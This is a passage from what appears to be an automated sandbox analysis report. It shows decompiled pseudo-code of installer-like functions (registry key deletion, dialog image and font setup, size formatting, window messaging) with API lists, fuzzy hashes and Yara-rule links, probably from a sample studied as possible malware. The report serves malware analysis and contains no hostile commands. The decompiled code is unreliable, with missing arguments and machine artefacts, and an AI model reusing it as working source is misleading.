							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73CA2EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73CA2F10(_t59, _t83, _t85);
						} else {
							_t48 = E73CA2F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73CA2D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73CA2E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73CA2D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x73ca1837
0x73ca1841
0x73ca184a
0x73ca184d
0x73ca1852
0x73ca185b
0x73ca1864
0x73ca1866
0x73ca186d
0x73ca186f
0x73ca1872
0x73ca1876
0x73ca1882
0x73ca188b
0x73ca1890
0x73ca1893
0x73ca1899
0x73ca1899
0x73ca189c
0x73ca189f
0x73ca18a2
0x73ca1968
0x73ca1968
0x73ca196b
0x73ca19e5
0x73ca19e9
0x73ca19f8
0x73ca19fb
0x73ca1a03
0x73ca1a03
0x73ca1a03
0x73ca1a05
0x73ca1a05
0x73ca1a06
0x73ca1a06
0x73ca1a08
0x73ca1a0a
0x73ca1a10
0x73ca1a19
0x73ca1a2a
0x73ca1a35
0x73ca1a35
0x73ca19fd
0x73ca19e0
0x73ca19e0
0x73ca19e2
0x73ca19e2
0x00000000
0x73ca19e2
0x73ca19ff
0x73ca1a01
0x00000000
0x00000000
0x00000000
0x73ca1a01
0x73ca19ed
0x73ca19f1
0x00000000
0x73ca19f1
0x73ca196d
0x73ca196d
0x73ca196e
0x73ca19d7
0x73ca19d9
0x00000000
0x00000000
0x73ca19db
0x73ca19de
0x00000000
0x00000000
0x00000000
0x73ca19de
0x73ca1970
0x73ca1970
0x73ca1971
0x73ca19aa
0x73ca19ae
0x73ca19ca
0x73ca19cd
0x00000000
0x00000000
0x73ca19cf
0x00000000
0x00000000
0x73ca19d1
0x73ca19d3
0x00000000
0x00000000
0x00000000
0x73ca19d5
0x73ca19b0
0x73ca19b4
0x73ca19b6
0x73ca19b8
0x73ca19ba
0x73ca19c3
0x73ca19bc
0x73ca19bc
0x73ca19bc
0x00000000
0x73ca19ba
0x73ca1973
0x73ca1973
0x73ca1976
0x73ca19a3
0x73ca19a5
0x00000000
0x73ca19a5
0x73ca1978
0x73ca1978
0x73ca197b
0x73ca198b
0x73ca198f
0x73ca199c
0x73ca199e
0x00000000
0x73ca199e
0x73ca1991
0x73ca1993
0x00000000
0x00000000
0x73ca1995
0x73ca1998
0x00000000
0x00000000
0x00000000
0x73ca199a
0x73ca197e
0x73ca197f
0x73ca1985
0x73ca1987
0x73ca1987
0x00000000
0x73ca197f
0x73ca18a8
0x73ca1920
0x73ca1922
0x73ca1925
0x73ca1943
0x73ca1946
0x73ca194c
0x73ca1951
0x73ca1927
0x73ca1927
0x73ca192b
0x73ca192f
0x73ca1931
0x73ca1931
0x73ca1954
0x73ca1957
0x00000000
0x73ca195d
0x73ca195d
0x73ca1960
0x00000000
0x73ca1960
0x73ca1957
0x73ca18aa
0x73ca18ad
0x73ca1911
0x73ca1913
0x73ca1915
0x00000000
0x00000000
0x00000000
0x73ca191b
0x73ca18af
0x73ca18b2
0x00000000
0x00000000
0x73ca18b4
0x73ca18b5
0x73ca18eb
0x73ca18ef
0x73ca1907
0x73ca1909
0x00000000
0x73ca1909
0x73ca18f1
0x73ca18f3
0x00000000
0x00000000
0x73ca18f9
0x73ca18fc
0x00000000
0x00000000
0x00000000
0x73ca1902
0x73ca18b7
0x73ca18ba
0x73ca18e1
0x00000000
0x73ca18bc
0x73ca18bc
0x73ca18bd
0x73ca18d1
0x73ca18d3
0x73ca18bf
0x73ca18c1
0x73ca18c7
0x73ca18c9
0x73ca18c9
0x73ca18c1
0x00000000
0x73ca18bd

APIs

GlobalFree.KERNEL32 ref: 73CA1893
GlobalFree.KERNEL32 ref: 73CA1A2A
GlobalFree.KERNEL32 ref: 73CA1A2F

Memory Dump Source

Source File: 00000000.00000002.241965832.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true

Associated: 00000000.00000002.241959915.0000000073CA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241972886.0000000073CA3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241983655.0000000073CA5000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: b5f90cece85a11474e6c74b372e1b3e0ec78581f353fbec2f318c3f54a315541
Instruction ID: 9634596c7f9f991d25b7a7084f69184f9bde76de19557cf9609c8dee6df7aea1
Opcode Fuzzy Hash: b5f90cece85a11474e6c74b372e1b3e0ec78581f353fbec2f318c3f54a315541
Instruction Fuzzy Hash: 99512C32D0829BAFEB029FBDC8447ADBBBAEB44355F1E015AD407EB184C631AE41C751

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32 ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}

0x00404b20
0x00404b25
0x00404b2d
0x00404b2e
0x00404b3b
0x00404b43
0x00404b44
0x00404b46
0x00404b48
0x00404b4a
0x00404b4d
0x00404b4d
0x00404b54
0x00404b5a
0x00404b5a
0x00404b61
0x00404b68
0x00404b6b
0x00404b6e
0x00404b6e
0x00404b72
0x00404b82
0x00404b84
0x00404b87
0x00404b30
0x00404b30
0x00404b37
0x00404b37
0x00404b8f
0x00404b9a
0x00404bb0
0x00404bc0
0x00404bdc

APIs

lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
wsprintfA.USER32 ref: 00404BC0
SetDlgItemTextA.USER32 ref: 00404BD3

Strings

%u.%u%s%s, xrefs: 00404BA2

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32 ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405be6
0x00405bfd
0x00405c05
0x00405c05
0x00405c0d

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040396E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040396E() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x29c
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x290
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
